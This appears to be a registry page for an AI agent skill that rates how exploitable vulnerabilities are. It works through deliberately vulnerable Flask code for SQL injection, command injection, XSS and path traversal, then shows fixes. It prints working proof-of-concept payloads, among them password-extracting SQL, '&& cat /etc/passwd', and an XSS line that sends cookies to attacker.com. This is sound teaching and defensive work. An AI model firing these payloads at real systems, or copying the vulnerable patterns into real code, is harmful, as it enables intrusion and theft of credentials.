Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Use when users need to: (1) Determine if a vulnerability is actually exploitable in practice, (2) Assess severity and impact of security issues, (3) Prioritize vulnerability remediation, (4) Understand attack vectors and exploitation conditions, (5) Generate exploitability reports with proof-of-concept scenarios. Focuses on injection vulnerabilities (SQL, command, XSS, path traversal, LDAP) with detailed analysis of reachability, controllability, sanitization, and impact.
Install with Tessl CLI
npx tessl i github:ArabelaTso/Skills-4-SE --skill exploitability-analyzer92
Does it follow best practices?
Validation for skill structure
Assess whether detected vulnerabilities are realistically exploitable.
This skill analyzes security vulnerabilities to determine if they're actually exploitable in practice. It examines control flow to assess reachability, traces input sources to evaluate controllability, analyzes sanitization logic, and considers execution context to provide realistic exploitability assessments with severity ratings.
Provide:
The skill will analyze:
Classify the vulnerability:
Follow the data from source to sink:
Source: Where does the input originate?
Transformations: What happens to the input?
Sink: Where is the input used dangerously?
Question: Can an attacker reach the vulnerable code path?
Critical: Public endpoint, no authentication High: Authenticated endpoint, common user role Medium: Requires specific conditions or privileges Low: Admin-only, internal function, rare code path None: Dead code, unreachable
Question: Can an attacker control the vulnerable input?
High: Direct user input (GET/POST parameters, headers) Medium: Indirect control (database, config files) Low: Derived values, heavily processed None: Hardcoded, system-generated
Question: Is the input properly sanitized?
None: No sanitization, direct pass-through Weak: Blacklist filtering, incomplete escaping Partial: Some sanitization but bypassable Strong: Whitelist validation, proper escaping, parameterization
Question: What damage can an attacker cause?
Critical: Remote code execution, full system compromise High: Data breach, privilege escalation, DoS Medium: Limited data access, information disclosure Low: Minor information leak, cosmetic issues
Combine factors to determine overall exploitability:
| Reachability | Controllability | Sanitization | Impact | Exploitability |
|---|---|---|---|---|
| High | High | None | Critical | CRITICAL |
| High | High | Weak | High | HIGH |
| High | High | Partial | Medium | MEDIUM |
| Medium | Medium | Strong | Low | LOW |
| Any | Any | Strong | Any | NONE |
Vulnerable Code:
@app.route('/user')
def get_user():
username = request.args.get('username')
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchone()Analysis:
1. Vulnerability Type: SQL Injection
2. Data Flow:
request.args.get('username') - user-controlled query parametercursor.execute(query) - SQL execution3. Reachability: High
/user)4. Controllability: High
username value5. Sanitization: None
6. Impact: Critical
7. Exploitability: CRITICAL
Proof-of-Concept:
GET /user?username=' OR '1'='1' --This bypasses authentication and returns all users.
Advanced Exploit:
GET /user?username=' UNION SELECT password FROM admin_users --This extracts admin passwords.
Remediation:
@app.route('/user')
def get_user():
username = request.args.get('username')
# Use parameterized query
query = "SELECT * FROM users WHERE username = ?"
cursor.execute(query, (username,))
return cursor.fetchone()Vulnerable Code:
@app.route('/ping')
def ping_host():
host = request.form.get('host')
if ';' in host or '|' in host:
return "Invalid host"
result = os.system(f"ping -c 4 {host}")
return f"Ping result: {result}"Analysis:
1. Vulnerability Type: Command Injection
2. Data Flow:
request.form.get('host') - user-controlled POST parameter; and |os.system() - shell command execution3. Reachability: High
4. Controllability: High
host parameter5. Sanitization: Weak
; and |$(), backticks, &&, ||, newlines6. Impact: Critical
7. Exploitability: HIGH (not Critical due to weak sanitization that may deter casual attackers)
Proof-of-Concept:
POST /ping
host=$(whoami)This executes whoami command.
Advanced Exploit:
POST /ping
host=127.0.0.1 && cat /etc/passwdThis reads sensitive files.
Remediation:
import subprocess
import shlex
@app.route('/ping')
def ping_host():
host = request.form.get('host')
# Validate input with whitelist
if not re.match(r'^[a-zA-Z0-9.-]+$', host):
return "Invalid host"
# Use subprocess without shell
result = subprocess.run(['ping', '-c', '4', host],
capture_output=True, text=True)
return f"Ping result: {result.stdout}"Vulnerable Code:
@app.route('/search')
def search():
query = request.args.get('q', '')
results = db.search(query)
return render_template_string(f"""
<h1>Search Results for: {query}</h1>
<ul>
{% for result in results %}
<li>{{ result }}</li>
{% endfor %}
</ul>
""", results=results)Analysis:
1. Vulnerability Type: Cross-Site Scripting (XSS)
2. Data Flow:
request.args.get('q') - user-controlled query parameterrender_template_string() - HTML rendering with f-string3. Reachability: High
4. Controllability: High
5. Sanitization: None
6. Impact: High
7. Exploitability: MEDIUM (assuming modern browser protections)
Proof-of-Concept:
GET /search?q=<script>alert(document.cookie)</script>This executes JavaScript in victim's browser.
Advanced Exploit:
GET /search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>This exfiltrates session cookies.
Remediation:
from markupsafe import escape
@app.route('/search')
def search():
query = request.args.get('q', '')
results = db.search(query)
# Use proper template with auto-escaping
return render_template('search.html',
query=escape(query),
results=results)Vulnerable Code:
@app.route('/download')
@login_required # Requires authentication
def download_file():
filename = request.args.get('file')
# Blacklist check
if '..' in filename:
return "Invalid filename"
filepath = os.path.join('/var/www/uploads', filename)
return send_file(filepath)Analysis:
1. Vulnerability Type: Path Traversal
2. Data Flow:
request.args.get('file') - user-controlled..send_file() - file system access3. Reachability: Medium
@login_required)4. Controllability: High
5. Sanitization: Weak
..6. Impact: Medium
7. Exploitability: LOW (authentication required + weak but present sanitization)
Proof-of-Concept:
GET /download?file=/etc/passwdThis may read sensitive files if absolute paths work.
Bypass Attempt:
GET /download?file=....//....//etc/passwdThis may bypass the .. check.
Remediation:
import os
@app.route('/download')
@login_required
def download_file():
filename = request.args.get('file')
# Whitelist validation
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
return "Invalid filename"
# Resolve and validate path
base_dir = '/var/www/uploads'
filepath = os.path.realpath(os.path.join(base_dir, filename))
if not filepath.startswith(base_dir):
return "Access denied"
return send_file(filepath)For each vulnerability, provide:
VULNERABILITY: <Type> in <Location>
Location: <File:line or endpoint>
Vulnerability Type: <SQL Injection, XSS, etc.>
DATA FLOW:
Source: <Where input comes from>
Transformations: <What happens to input>
Sink: <Where input is used dangerously>
EXPLOITABILITY ASSESSMENT:
Reachability: <Critical/High/Medium/Low/None> - <Explanation>
Controllability: <High/Medium/Low/None> - <Explanation>
Sanitization: <None/Weak/Partial/Strong> - <Explanation>
Impact: <Critical/High/Medium/Low> - <Explanation>
OVERALL EXPLOITABILITY: <CRITICAL/HIGH/MEDIUM/LOW/NONE>
PROOF-OF-CONCEPT:
<Example exploit demonstrating the vulnerability>
IMPACT:
<Detailed description of potential damage>
REMEDIATION:
<Specific code fix or mitigation strategy>Detailed assessment criteria:
Load this reference when:
c1fb172
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.